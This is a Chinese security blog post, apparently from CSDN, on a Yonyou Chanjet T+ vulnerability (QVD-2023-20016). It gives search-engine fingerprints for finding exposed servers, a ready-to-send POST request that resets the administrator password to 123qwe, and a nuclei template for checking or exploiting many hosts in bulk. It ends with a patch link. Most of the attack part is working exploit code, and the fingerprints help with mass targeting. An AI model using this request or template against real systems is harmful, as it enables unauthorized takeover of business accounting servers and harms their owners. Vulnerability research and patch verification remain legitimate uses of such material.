(附nuclei 批量验证文件)用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞(QVD-2023-20016)

(附nuclei 批量验证文件)用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞(QVD-2023-20016)

声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

1、漏洞简介

用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞(QVD-2023-20016)

2、资产指纹

fofa:app=“畅捷通-TPlus”
hunter: app.name=“畅捷通 T+”

3、漏洞复现

发送以下请求,将重置admin密码为123qwe

POST /tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Content-Length: 45
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

{"pwdNew":"46f94c8de14fb36680850768ff1b7f2a"}

在这里插入图片描述

在这里插入图片描述

4、nuclei yaml文件

id: chanjettplus-recoverpassword

info:
  name: chanjettplus recoverpassword
  author: xxxx
  severity: critical
  description: |
    admin管理员密码修改为123qwe
  tags: chanjettplus

http:
  - raw:
    - |
      POST /tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd HTTP/1.1
      Host: {{Hostname}}
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
      Accept: */*
      Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
      Accept-Encoding: gzip, deflate
      Connection: close
      Content-Length: 47
      
      {"pwdNew":"46f94c8de14fb36680850768ff1b7f2a"}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_1==200 && contains_all(body_1,"true")'

修复方式

及时前往用友官网获取补丁https://security.yonyou.com/#/noticeInfo?id=233

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值